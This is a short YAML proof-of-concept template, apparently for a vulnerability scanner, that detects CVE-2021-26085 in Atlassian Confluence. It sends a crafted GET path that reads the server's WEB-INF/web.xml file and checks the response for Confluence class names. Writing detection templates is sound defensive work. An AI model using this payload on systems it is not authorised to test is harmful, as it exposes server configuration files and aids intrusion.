name: poc-yaml-confluence-cve-2021-26085-arbitrary-file-read set: rand: randomLowercase(6) rules: - method: GET path: /s/{{rand}}/_/;/WEB-INF/web.xml follow_redirects: false expression: response.status == 200 && response.body.bcontains(b"Confluence") && response.body.bcontains(b"com.atlassian.confluence.setup.ConfluenceAppConfig") detail: author: wulalalaaa(https://github.com/wulalalaaa) links: - https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html